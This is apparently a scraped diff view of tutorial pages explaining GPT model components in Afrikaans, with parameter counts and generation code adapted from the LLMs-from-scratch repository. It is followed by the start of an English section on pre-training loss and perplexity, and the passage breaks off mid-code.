> Soos jy kan sien, gebruik die Feed Forward netwerk 3 lae. Die eerste een is 'n lineêre laag wat die dimensies met 4 sal vermenigvuldig deur lineêre gewigte (parameters om binne die model te train). Dan word die GELU-funksie in al daardie dimensies gebruik om nie-lineêre variasies toe te pas om ryker verteenwoordigings te vang en uiteindelik word 'n ander lineêre laag gebruik om terug te keer na die oorspronklike grootte van dimensies.
|
|
||||||
|
|
||||||
### **Multi-Head Aandag Meganisme**
|
|
||||||
|
|
||||||
Dit is reeds in 'n vroeëre afdeling verduidelik.
|
|
||||||
|
|
||||||
#### **Doel en Funksionaliteit**
|
|
||||||
|
|
||||||
- **Multi-Head Self-Attention:** Laat die model toe om op verskillende posisies binne die invoer volgorde te fokus wanneer 'n token gekodeer word.
|
|
||||||
- **Belangrike Komponente:**
|
|
||||||
- **Vrae, Sleutels, Waardes:** Lineêre projeksies van die invoer, gebruik om aandag punte te bereken.
|
|
||||||
- **Koppe:** Meervoudige aandag meganismes wat parallel loop (`num_heads`), elk met 'n verminderde dimensie (`head_dim`).
|
|
||||||
- **Aandag Punte:** Bereken as die skaalproduk van vrae en sleutels, geskaal en gemaskeer.
|
|
||||||
- **Maskering:** 'n Oorsaaklike masker word toegepas om te voorkom dat die model na toekomstige tokens aandag gee (belangrik vir outoregressiewe modelle soos GPT).
|
|
||||||
- **Aandag Gewigte:** Softmax van die gemaskeerde en geskaalde aandag punte.
|
|
||||||
- **Konteks Vektor:** Gewigte som van die waardes, volgens aandag gewigte.
|
|
||||||
- **Uitset Projektering:** Lineêre laag om die uitsette van al die koppe te kombineer.
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> Die doel van hierdie netwerk is om die verhoudings tussen tokens in dieselfde konteks te vind. Boonop word die tokens in verskillende koppe verdeel om oorfitting te voorkom alhoewel die finale verhoudings wat per kop gevind word aan die einde van hierdie netwerk gekombineer word.
|
|
||||||
>
|
|
||||||
> Boonop, tydens opleiding, word 'n **oorsaaklike masker** toegepas sodat latere tokens nie in ag geneem word wanneer die spesifieke verhoudings met 'n token gekyk word nie en 'n **dropout** word ook toegepas om **oorfitting te voorkom**.
|
|
||||||
|
|
||||||
### **Laag** Normalisering
|
|
||||||
```python
|
|
||||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
|
|
||||||
class LayerNorm(nn.Module):
|
|
||||||
def __init__(self, emb_dim):
|
|
||||||
super().__init__()
|
|
||||||
self.eps = 1e-5 # Prevent division by zero during normalization.
|
|
||||||
self.scale = nn.Parameter(torch.ones(emb_dim))
|
|
||||||
self.shift = nn.Parameter(torch.zeros(emb_dim))
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
mean = x.mean(dim=-1, keepdim=True)
|
|
||||||
var = x.var(dim=-1, keepdim=True, unbiased=False)
|
|
||||||
norm_x = (x - mean) / torch.sqrt(var + self.eps)
|
|
||||||
return self.scale * norm_x + self.shift
|
|
||||||
```
|
|
||||||
#### **Doel en Funksionaliteit**
|
|
||||||
|
|
||||||
- **Laag Normalisering:** 'n Tegniek wat gebruik word om die insette oor die kenmerke (embedding dimensies) vir elke individuele voorbeeld in 'n bondel te normaliseer.
|
|
||||||
- **Komponente:**
|
|
||||||
- **`eps`:** 'n Klein konstante (`1e-5`) wat by die variansie gevoeg word om deling deur nul tydens normalisering te voorkom.
|
|
||||||
- **`scale` en `shift`:** Leerbare parameters (`nn.Parameter`) wat die model toelaat om die genormaliseerde uitset te skaal en te verskuif. Hulle word onderskeidelik geinitialiseer na een en nul.
|
|
||||||
- **Normalisering Proses:**
|
|
||||||
- **Bereken Gemiddelde (`mean`):** Bereken die gemiddelde van die inset `x` oor die embedding dimensie (`dim=-1`), terwyl die dimensie vir broadcasting behou word (`keepdim=True`).
|
|
||||||
- **Bereken Variansie (`var`):** Bereken die variansie van `x` oor die embedding dimensie, terwyl die dimensie ook behou word. Die `unbiased=False` parameter verseker dat die variansie bereken word met die bevooroordeelde skatter (deling deur `N` in plaas van `N-1`), wat toepaslik is wanneer daar oor kenmerke eerder as monsters genormaliseer word.
|
|
||||||
- **Normaliseer (`norm_x`):** Trek die gemiddelde van `x` af en deel deur die vierkantswortel van die variansie plus `eps`.
|
|
||||||
- **Skaal en Verskuif:** Pas die leerbare `scale` en `shift` parameters toe op die genormaliseerde uitset.
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> Die doel is om 'n gemiddelde van 0 met 'n variansie van 1 oor alle dimensies van dieselfde token te verseker. Die doel hiervan is om **die opleiding van diep neurale netwerke te stabiliseer** deur die interne kovariate verskuiwing te verminder, wat verwys na die verandering in die verspreiding van netwerkaktiverings as gevolg van die opdatering van parameters tydens opleiding.
|
|
||||||
|
|
||||||
### **Transformer Blok**
|
|
||||||
|
|
||||||
_Vorms is as kommentaar bygevoeg om beter te verstaan hoe die vorms van matrikse lyk:_
|
|
||||||
```python
|
|
||||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
|
|
||||||
|
|
||||||
class TransformerBlock(nn.Module):
|
|
||||||
def __init__(self, cfg):
|
|
||||||
super().__init__()
|
|
||||||
self.att = MultiHeadAttention(
|
|
||||||
d_in=cfg["emb_dim"],
|
|
||||||
d_out=cfg["emb_dim"],
|
|
||||||
context_length=cfg["context_length"],
|
|
||||||
num_heads=cfg["n_heads"],
|
|
||||||
dropout=cfg["drop_rate"],
|
|
||||||
qkv_bias=cfg["qkv_bias"]
|
|
||||||
)
|
|
||||||
self.ff = FeedForward(cfg)
|
|
||||||
self.norm1 = LayerNorm(cfg["emb_dim"])
|
|
||||||
self.norm2 = LayerNorm(cfg["emb_dim"])
|
|
||||||
self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
# x shape: (batch_size, seq_len, emb_dim)
|
|
||||||
|
|
||||||
# Shortcut connection for attention block
|
|
||||||
shortcut = x # shape: (batch_size, seq_len, emb_dim)
|
|
||||||
x = self.norm1(x) # shape remains (batch_size, seq_len, emb_dim)
|
|
||||||
x = self.att(x) # shape: (batch_size, seq_len, emb_dim)
|
|
||||||
x = self.drop_shortcut(x) # shape remains (batch_size, seq_len, emb_dim)
|
|
||||||
x = x + shortcut # shape: (batch_size, seq_len, emb_dim)
|
|
||||||
|
|
||||||
# Shortcut connection for feedforward block
|
|
||||||
shortcut = x # shape: (batch_size, seq_len, emb_dim)
|
|
||||||
x = self.norm2(x) # shape remains (batch_size, seq_len, emb_dim)
|
|
||||||
x = self.ff(x) # shape: (batch_size, seq_len, emb_dim)
|
|
||||||
x = self.drop_shortcut(x) # shape remains (batch_size, seq_len, emb_dim)
|
|
||||||
x = x + shortcut # shape: (batch_size, seq_len, emb_dim)
|
|
||||||
|
|
||||||
return x # Output shape: (batch_size, seq_len, emb_dim)
|
|
||||||
|
|
||||||
```
|
|
||||||
#### **Doel en Funksionaliteit**
|
|
||||||
|
|
||||||
- **Samestelling van Lae:** Kombineer multi-head attention, feedforward netwerk, laanormalisering, en residuele verbindings.
|
|
||||||
- **Laanormalisering:** Toegepas voor die aandag en feedforward lae vir stabiele opleiding.
|
|
||||||
- **Residuele Verbindings (Kortpaaie):** Voeg die invoer van 'n laag by sy uitvoer om die gradiëntvloei te verbeter en die opleiding van diep netwerke moontlik te maak.
|
|
||||||
- **Dropout:** Toegepas na aandag en feedforward lae vir regulering.
|
|
||||||
|
|
||||||
#### **Stap-vir-Stap Funksionaliteit**
|
|
||||||
|
|
||||||
1. **Eerste Residuele Pad (Self-Aandagtigheid):**
|
|
||||||
- **Invoer (`shortcut`):** Stoor die oorspronklike invoer vir die residuele verbinding.
|
|
||||||
- **Laag Norm (`norm1`):** Normaliseer die invoer.
|
|
||||||
- **Multi-Head Attention (`att`):** Pas self-aandagtigheid toe.
|
|
||||||
- **Dropout (`drop_shortcut`):** Pas dropout toe vir regulering.
|
|
||||||
- **Voeg Residueel By (`x + shortcut`):** Kombineer met die oorspronklike invoer.
|
|
||||||
2. **Tweedee Residuele Pad (FeedForward):**
|
|
||||||
- **Invoer (`shortcut`):** Stoor die opgedateerde invoer vir die volgende residuele verbinding.
|
|
||||||
- **Laag Norm (`norm2`):** Normaliseer die invoer.
|
|
||||||
- **FeedForward Netwerk (`ff`):** Pas die feedforward transformasie toe.
|
|
||||||
- **Dropout (`drop_shortcut`):** Pas dropout toe.
|
|
||||||
- **Voeg Residueel By (`x + shortcut`):** Kombineer met die invoer van die eerste residuele pad.
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> Die transformer blok groepeer al die netwerke saam en pas 'n paar **normalisering** en **dropouts** toe om die opleidingsstabiliteit en resultate te verbeter.\
|
|
||||||
> Let op hoe dropouts gedoen word na die gebruik van elke netwerk terwyl normalisering voorheen toegepas word.
|
|
||||||
>
|
|
||||||
> Boonop gebruik dit ook kortpaaie wat bestaan uit **die uitvoer van 'n netwerk by sy invoer te voeg**. Dit help om die verdwynende gradiëntprobleem te voorkom deur te verseker dat aanvanklike lae "net soveel" bydra as die laaste.
|
|
||||||
|
|
||||||
### **GPTModel**
|
|
||||||
|
|
||||||
_Vorms is as kommentaar bygevoeg om die vorms van matrikse beter te verstaan:_
|
|
||||||
```python
|
|
||||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
|
|
||||||
class GPTModel(nn.Module):
|
|
||||||
def __init__(self, cfg):
|
|
||||||
super().__init__()
|
|
||||||
self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
|
|
||||||
# shape: (vocab_size, emb_dim)
|
|
||||||
|
|
||||||
self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
|
|
||||||
# shape: (context_length, emb_dim)
|
|
||||||
|
|
||||||
self.drop_emb = nn.Dropout(cfg["drop_rate"])
|
|
||||||
|
|
||||||
self.trf_blocks = nn.Sequential(
|
|
||||||
*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])]
|
|
||||||
)
|
|
||||||
# Stack of TransformerBlocks
|
|
||||||
|
|
||||||
self.final_norm = LayerNorm(cfg["emb_dim"])
|
|
||||||
self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
|
|
||||||
# shape: (emb_dim, vocab_size)
|
|
||||||
|
|
||||||
def forward(self, in_idx):
|
|
||||||
# in_idx shape: (batch_size, seq_len)
|
|
||||||
batch_size, seq_len = in_idx.shape
|
|
||||||
|
|
||||||
# Token embeddings
|
|
||||||
tok_embeds = self.tok_emb(in_idx)
|
|
||||||
# shape: (batch_size, seq_len, emb_dim)
|
|
||||||
|
|
||||||
# Positional embeddings
|
|
||||||
pos_indices = torch.arange(seq_len, device=in_idx.device)
|
|
||||||
# shape: (seq_len,)
|
|
||||||
pos_embeds = self.pos_emb(pos_indices)
|
|
||||||
# shape: (seq_len, emb_dim)
|
|
||||||
|
|
||||||
# Add token and positional embeddings
|
|
||||||
x = tok_embeds + pos_embeds # Broadcasting over batch dimension
|
|
||||||
# x shape: (batch_size, seq_len, emb_dim)
|
|
||||||
|
|
||||||
x = self.drop_emb(x) # Dropout applied
|
|
||||||
# x shape remains: (batch_size, seq_len, emb_dim)
|
|
||||||
|
|
||||||
x = self.trf_blocks(x) # Pass through Transformer blocks
|
|
||||||
# x shape remains: (batch_size, seq_len, emb_dim)
|
|
||||||
|
|
||||||
x = self.final_norm(x) # Final LayerNorm
|
|
||||||
# x shape remains: (batch_size, seq_len, emb_dim)
|
|
||||||
|
|
||||||
logits = self.out_head(x) # Project to vocabulary size
|
|
||||||
# logits shape: (batch_size, seq_len, vocab_size)
|
|
||||||
|
|
||||||
return logits # Output shape: (batch_size, seq_len, vocab_size)
|
|
||||||
```
|
|
||||||
#### **Doel en Funksionaliteit**
|
|
||||||
|
|
||||||
- **Inbedingslae:**
|
|
||||||
- **Token Inbedings (`tok_emb`):** Converteer token-indekse in inbedings. Ter herinnering, dit is die gewigte wat aan elke dimensie van elke token in die woordeskat gegee word.
|
|
||||||
- **Posisionele Inbedings (`pos_emb`):** Voeg posisionele inligting by die inbedings om die volgorde van tokens vas te vang. Ter herinnering, dit is die gewigte wat aan tokens gegee word volgens hul posisie in die teks.
|
|
||||||
- **Dropout (`drop_emb`):** Toegepas op inbedings vir regularisering.
|
|
||||||
- **Transformer Blokke (`trf_blocks`):** Stapel van `n_layers` transformer blokke om inbedings te verwerk.
|
|
||||||
- **Finale Normalisering (`final_norm`):** Laag normalisering voor die uitvoerlaag.
|
|
||||||
- **Uitvoerlaag (`out_head`):** Projek die finale verborge toestande na die woordeskatgrootte om logits vir voorspelling te produseer.
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> Die doel van hierdie klas is om al die ander genoemde netwerke te **voorspel die volgende token in 'n reeks**, wat fundamenteel is vir take soos teksgenerasie.
|
|
||||||
>
|
|
||||||
> Let op hoe dit **soveel transformer blokke as aangedui** sal **gebruik** en dat elke transformer blok een multi-head attestasienet, een feed forward-net en verskeie normaliserings gebruik. So as 12 transformer blokke gebruik word, vermenigvuldig dit met 12.
|
|
||||||
>
|
|
||||||
> Boonop word 'n **normalisering** laag **voor** die **uitvoer** bygevoeg en 'n finale lineêre laag word aan die einde toegepas om die resultate met die regte dimensies te verkry. Let op hoe elke finale vektor die grootte van die gebruikte woordeskat het. Dit is omdat dit probeer om 'n waarskynlikheid per moontlike token binne die woordeskat te kry.
|
|
||||||
|
|
||||||
## Aantal Parameters om te train
|
|
||||||
|
|
||||||
Met die GPT-struktuur gedefinieer, is dit moontlik om die aantal parameters om te train te bepaal:
|
|
||||||
```python
|
|
||||||
GPT_CONFIG_124M = {
|
|
||||||
"vocab_size": 50257, # Vocabulary size
|
|
||||||
"context_length": 1024, # Context length
|
|
||||||
"emb_dim": 768, # Embedding dimension
|
|
||||||
"n_heads": 12, # Number of attention heads
|
|
||||||
"n_layers": 12, # Number of layers
|
|
||||||
"drop_rate": 0.1, # Dropout rate
|
|
||||||
"qkv_bias": False # Query-Key-Value bias
|
|
||||||
}
|
|
||||||
|
|
||||||
model = GPTModel(GPT_CONFIG_124M)
|
|
||||||
total_params = sum(p.numel() for p in model.parameters())
|
|
||||||
print(f"Total number of parameters: {total_params:,}")
|
|
||||||
# Total number of parameters: 163,009,536
|
|
||||||
```
|
|
||||||
### **Stap-vir-Stap Berekening**
|
|
||||||
|
|
||||||
#### **1. Inbedingslae: Token Inbeding & Posisie Inbeding**
|
|
||||||
|
|
||||||
- **Laag:** `nn.Embedding(vocab_size, emb_dim)`
|
|
||||||
- **Parameters:** `vocab_size * emb_dim`
|
|
||||||
```python
|
|
||||||
token_embedding_params = 50257 * 768 = 38,597,376
|
|
||||||
```
|
|
||||||
- **Laag:** `nn.Embedding(context_length, emb_dim)`
|
|
||||||
- **Parameters:** `context_length * emb_dim`
|
|
||||||
```python
|
|
||||||
position_embedding_params = 1024 * 768 = 786,432
|
|
||||||
```
|
|
||||||
**Totale Inbedingsparameters**
|
|
||||||
```python
|
|
||||||
embedding_params = token_embedding_params + position_embedding_params
|
|
||||||
embedding_params = 38,597,376 + 786,432 = 39,383,808
|
|
||||||
```
|
|
||||||
#### **2. Transformer Blokke**
|
|
||||||
|
|
||||||
Daar is 12 transformer blokke, so ons sal die parameters vir een blok bereken en dan met 12 vermenigvuldig.
|
|
||||||
|
|
||||||
**Parameters per Transformer Blok**
|
|
||||||
|
|
||||||
**a. Multi-Head Aandag**
|
|
||||||
|
|
||||||
- **Komponente:**
|
|
||||||
- **Query Lineêre Laag (`W_query`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
|
|
||||||
- **Key Lineêre Laag (`W_key`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
|
|
||||||
- **Value Lineêre Laag (`W_value`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
|
|
||||||
- **Uitset Projektering (`out_proj`):** `nn.Linear(emb_dim, emb_dim)`
|
|
||||||
- **Berekeninge:**
|
|
||||||
|
|
||||||
- **Elk van `W_query`, `W_key`, `W_value`:**
|
|
||||||
|
|
||||||
```python
|
|
||||||
qkv_params = emb_dim * emb_dim = 768 * 768 = 589,824
|
|
||||||
```
|
|
||||||
|
|
||||||
Aangesien daar drie sulke lae is:
|
|
||||||
|
|
||||||
```python
|
|
||||||
total_qkv_params = 3 * qkv_params = 3 * 589,824 = 1,769,472
|
|
||||||
```
|
|
||||||
|
|
||||||
- **Uitset Projektering (`out_proj`):**
|
|
||||||
|
|
||||||
```python
|
|
||||||
out_proj_params = (emb_dim * emb_dim) + emb_dim = (768 * 768) + 768 = 589,824 + 768 = 590,592
|
|
||||||
```
|
|
||||||
|
|
||||||
- **Totale Multi-Head Aandag Parameters:**
|
|
||||||
|
|
||||||
```python
|
|
||||||
mha_params = total_qkv_params + out_proj_params
|
|
||||||
mha_params = 1,769,472 + 590,592 = 2,360,064
|
|
||||||
```
|
|
||||||
|
|
||||||
**b. Voedingsnetwerk**
|
|
||||||
|
|
||||||
- **Komponente:**
|
|
||||||
- **Eerste Lineêre Laag:** `nn.Linear(emb_dim, 4 * emb_dim)`
|
|
||||||
- **Tweedel Lineêre Laag:** `nn.Linear(4 * emb_dim, emb_dim)`
|
|
||||||
- **Berekeninge:**
|
|
||||||
|
|
||||||
- **Eerste Lineêre Laag:**
|
|
||||||
|
|
||||||
```python
|
|
||||||
ff_first_layer_params = (emb_dim * 4 * emb_dim) + (4 * emb_dim)
|
|
||||||
ff_first_layer_params = (768 * 3072) + 3072 = 2,359,296 + 3,072 = 2,362,368
|
|
||||||
```
|
|
||||||
|
|
||||||
- **Tweedel Lineêre Laag:**
|
|
||||||
|
|
||||||
```python
|
|
||||||
ff_second_layer_params = (4 * emb_dim * emb_dim) + emb_dim
|
|
||||||
ff_second_layer_params = (3072 * 768) + 768 = 2,359,296 + 768 = 2,360,064
|
|
||||||
```
|
|
||||||
|
|
||||||
- **Totale Voedingsparameters:**
|
|
||||||
|
|
||||||
```python
|
|
||||||
ff_params = ff_first_layer_params + ff_second_layer_params
|
|
||||||
ff_params = 2,362,368 + 2,360,064 = 4,722,432
|
|
||||||
```
|
|
||||||
|
|
||||||
**c. Laag Normalisasies**
|
|
||||||
|
|
||||||
- **Komponente:**
|
|
||||||
- Twee `LayerNorm` instansies per blok.
|
|
||||||
- Elke `LayerNorm` het `2 * emb_dim` parameters (skaal en skuif).
|
|
||||||
- **Berekeninge:**
|
|
||||||
|
|
||||||
```python
|
|
||||||
layer_norm_params_per_block = 2 * (2 * emb_dim) = 2 * 768 * 2 = 3,072
|
|
||||||
```
|
|
||||||
|
|
||||||
**d. Totale Parameters per Transformer Blok**
|
|
||||||
```python
|
|
||||||
pythonCopy codeparams_per_block = mha_params + ff_params + layer_norm_params_per_block
|
|
||||||
params_per_block = 2,360,064 + 4,722,432 + 3,072 = 7,085,568
|
|
||||||
```
|
|
||||||
**Totale Parameters vir Alle Transformator Blokke**
|
|
||||||
```python
|
|
||||||
pythonCopy codetotal_transformer_blocks_params = params_per_block * n_layers
|
|
||||||
total_transformer_blocks_params = 7,085,568 * 12 = 85,026,816
|
|
||||||
```
|
|
||||||
#### **3. Finale Lae**
|
|
||||||
|
|
||||||
**a. Finale Laag Normalisering**
|
|
||||||
|
|
||||||
- **Parameters:** `2 * emb_dim` (skaal en skuif)
|
|
||||||
```python
|
|
||||||
pythonCopy codefinal_layer_norm_params = 2 * 768 = 1,536
|
|
||||||
```
|
|
||||||
**b. Uitsetprojeklaag (`out_head`)**
|
|
||||||
|
|
||||||
- **Laag:** `nn.Linear(emb_dim, vocab_size, bias=False)`
|
|
||||||
- **Parameters:** `emb_dim * vocab_size`
|
|
||||||
```python
|
|
||||||
pythonCopy codeoutput_projection_params = 768 * 50257 = 38,597,376
|
|
||||||
```
|
|
||||||
#### **4. Samevat van Alle Parameters**
|
|
||||||
```python
|
|
||||||
pythonCopy codetotal_params = (
|
|
||||||
embedding_params +
|
|
||||||
total_transformer_blocks_params +
|
|
||||||
final_layer_norm_params +
|
|
||||||
output_projection_params
|
|
||||||
)
|
|
||||||
total_params = (
|
|
||||||
39,383,808 +
|
|
||||||
85,026,816 +
|
|
||||||
1,536 +
|
|
||||||
38,597,376
|
|
||||||
)
|
|
||||||
total_params = 163,009,536
|
|
||||||
```
|
|
||||||
## Genereer Tegnies
|
|
||||||
|
|
||||||
Om 'n model te hê wat die volgende token voorspel soos die vorige, is dit net nodig om die laaste tokenwaardes van die uitvoer te neem (aangesien dit die waardes van die voorspelde token sal wees), wat 'n **waarde per inskrywing in die woordeskat** sal wees en dan die `softmax` funksie te gebruik om die dimensies in waarskynlikhede te normaliseer wat 1 optel en dan die indeks van die grootste inskrywing te kry, wat die indeks van die woord binne die woordeskat sal wees.
|
|
||||||
|
|
||||||
Code from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
|
|
||||||
```python
|
|
||||||
def generate_text_simple(model, idx, max_new_tokens, context_size):
|
|
||||||
# idx is (batch, n_tokens) array of indices in the current context
|
|
||||||
for _ in range(max_new_tokens):
|
|
||||||
|
|
||||||
# Crop current context if it exceeds the supported context size
|
|
||||||
# E.g., if LLM supports only 5 tokens, and the context size is 10
|
|
||||||
# then only the last 5 tokens are used as context
|
|
||||||
idx_cond = idx[:, -context_size:]
|
|
||||||
|
|
||||||
# Get the predictions
|
|
||||||
with torch.no_grad():
|
|
||||||
logits = model(idx_cond)
|
|
||||||
|
|
||||||
# Focus only on the last time step
|
|
||||||
# (batch, n_tokens, vocab_size) becomes (batch, vocab_size)
|
|
||||||
logits = logits[:, -1, :]
|
|
||||||
|
|
||||||
# Apply softmax to get probabilities
|
|
||||||
probas = torch.softmax(logits, dim=-1) # (batch, vocab_size)
|
|
||||||
|
|
||||||
# Get the idx of the vocab entry with the highest probability value
|
|
||||||
idx_next = torch.argmax(probas, dim=-1, keepdim=True) # (batch, 1)
|
|
||||||
|
|
||||||
# Append sampled index to the running sequence
|
|
||||||
idx = torch.cat((idx, idx_next), dim=1) # (batch, n_tokens+1)
|
|
||||||
|
|
||||||
return idx
|
|
||||||
|
|
||||||
|
|
||||||
start_context = "Hello, I am"
|
|
||||||
|
|
||||||
encoded = tokenizer.encode(start_context)
|
|
||||||
print("encoded:", encoded)
|
|
||||||
|
|
||||||
encoded_tensor = torch.tensor(encoded).unsqueeze(0)
|
|
||||||
print("encoded_tensor.shape:", encoded_tensor.shape)
|
|
||||||
|
|
||||||
model.eval() # disable dropout
|
|
||||||
|
|
||||||
out = generate_text_simple(
|
|
||||||
model=model,
|
|
||||||
idx=encoded_tensor,
|
|
||||||
max_new_tokens=6,
|
|
||||||
context_size=GPT_CONFIG_124M["context_length"]
|
|
||||||
)
|
|
||||||
|
|
||||||
print("Output:", out)
|
|
||||||
print("Output length:", len(out[0]))
|
|
||||||
```
|
|
||||||
## Verwysings
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
@ -1,970 +0,0 @@
|
|||||||
# 6. Pre-training & Loading models
|
|
||||||
|
|
||||||
## Text Generation
|
|
||||||
|
|
||||||
In order to train a model we will need that model to be able to generate new tokens. Then we will compare the generated tokens with the expected ones in order to train the model into **learning the tokens it needs to generate**.
|
|
||||||
|
|
||||||
As in the previous examples we already predicted some tokens, it's possible to reuse that function for this purpose.
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model.
|
|
||||||
|
|
||||||
## Text Evaluation
|
|
||||||
|
|
||||||
In order to perform a correct training it's needed to measure check the predictions obtained for the expected token. The goal of the training is to maximize the likelihood of the correct token, which involves increasing its probability relative to other tokens.
|
|
||||||
|
|
||||||
In order to maximize the probability of the correct token, the weights of the model must be modified to that probability is maximised. The updates of the weights is done via **backpropagation**. This requires a **loss function to maximize**. In this case, the function will be the **difference between the performed prediction and the desired one**.
|
|
||||||
|
|
||||||
However, instead of working with the raw predictions, it will work with a logarithm with base n. So if the current prediction of the expected token was 7.4541e-05, the natural logarithm (base *e*) of **7.4541e-05** is approximately **-9.5042**.\
|
|
||||||
Then, for each entry with a context length of 5 tokens for example, the model will need to predict 5 tokens, being the first 4 tokens the last one of the input and the fifth the predicted one. Therefore, for each entry we will have 5 predictions in that case (even if the first 4 ones were in the input the model doesn't know this) with 5 expected token and therefore 5 probabilities to maximize.
|
|
||||||
|
|
||||||
Therefore, after performing the natural logarithm to each prediction, the **average** is calculated, the **minus symbol removed** (this is called _cross entropy loss_) and thats the **number to reduce as close to 0 as possible** because the natural logarithm of 1 is 0:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (10) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233">https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233</a></p></figcaption></figure>
|
|
||||||
|
|
||||||
Another way to measure how good the model is is called perplexity. **Perplexity** is a metric used to evaluate how well a probability model predicts a sample. In language modelling, it represents the **model's uncertainty** when predicting the next token in a sequence.\
|
|
||||||
For example, a perplexity value of 48725, means that when needed to predict a token it's unsure about which among 48,725 tokens in the vocabulary is the good one.
|
|
||||||
|
|
||||||
## Pre-Train Example
|
|
||||||
|
|
||||||
This is the initial code proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb) some times slightly modify
|
|
||||||
|
|
||||||
<details>
|
|
||||||
|
|
||||||
<summary>Previous code used here but already explained in previous sections</summary>
|
|
||||||
|
|
||||||
```python
|
|
||||||
"""
|
|
||||||
This is code explained before so it won't be exaplained
|
|
||||||
"""
|
|
||||||
|
|
||||||
import tiktoken
|
|
||||||
import torch
|
|
||||||
import torch.nn as nn
|
|
||||||
from torch.utils.data import Dataset, DataLoader
|
|
||||||
|
|
||||||
|
|
||||||
class GPTDatasetV1(Dataset):
|
|
||||||
def __init__(self, txt, tokenizer, max_length, stride):
|
|
||||||
self.input_ids = []
|
|
||||||
self.target_ids = []
|
|
||||||
|
|
||||||
# Tokenize the entire text
|
|
||||||
token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})
|
|
||||||
|
|
||||||
# Use a sliding window to chunk the book into overlapping sequences of max_length
|
|
||||||
for i in range(0, len(token_ids) - max_length, stride):
|
|
||||||
input_chunk = token_ids[i:i + max_length]
|
|
||||||
target_chunk = token_ids[i + 1: i + max_length + 1]
|
|
||||||
self.input_ids.append(torch.tensor(input_chunk))
|
|
||||||
self.target_ids.append(torch.tensor(target_chunk))
|
|
||||||
|
|
||||||
def __len__(self):
|
|
||||||
return len(self.input_ids)
|
|
||||||
|
|
||||||
def __getitem__(self, idx):
|
|
||||||
return self.input_ids[idx], self.target_ids[idx]
|
|
||||||
|
|
||||||
|
|
||||||
def create_dataloader_v1(txt, batch_size=4, max_length=256,
|
|
||||||
stride=128, shuffle=True, drop_last=True, num_workers=0):
|
|
||||||
# Initialize the tokenizer
|
|
||||||
tokenizer = tiktoken.get_encoding("gpt2")
|
|
||||||
|
|
||||||
# Create dataset
|
|
||||||
dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)
|
|
||||||
|
|
||||||
# Create dataloader
|
|
||||||
dataloader = DataLoader(
|
|
||||||
dataset, batch_size=batch_size, shuffle=shuffle, drop_last=drop_last, num_workers=num_workers)
|
|
||||||
|
|
||||||
return dataloader
|
|
||||||
|
|
||||||
|
|
||||||
class MultiHeadAttention(nn.Module):
|
|
||||||
def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
|
|
||||||
super().__init__()
|
|
||||||
assert d_out % num_heads == 0, "d_out must be divisible by n_heads"
|
|
||||||
|
|
||||||
self.d_out = d_out
|
|
||||||
self.num_heads = num_heads
|
|
||||||
self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
|
|
||||||
|
|
||||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
|
|
||||||
self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs
|
|
||||||
self.dropout = nn.Dropout(dropout)
|
|
||||||
self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
b, num_tokens, d_in = x.shape
|
|
||||||
|
|
||||||
keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
|
|
||||||
queries = self.W_query(x)
|
|
||||||
values = self.W_value(x)
|
|
||||||
|
|
||||||
# We implicitly split the matrix by adding a `num_heads` dimension
|
|
||||||
# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
|
|
||||||
keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
|
|
||||||
values = values.view(b, num_tokens, self.num_heads, self.head_dim)
|
|
||||||
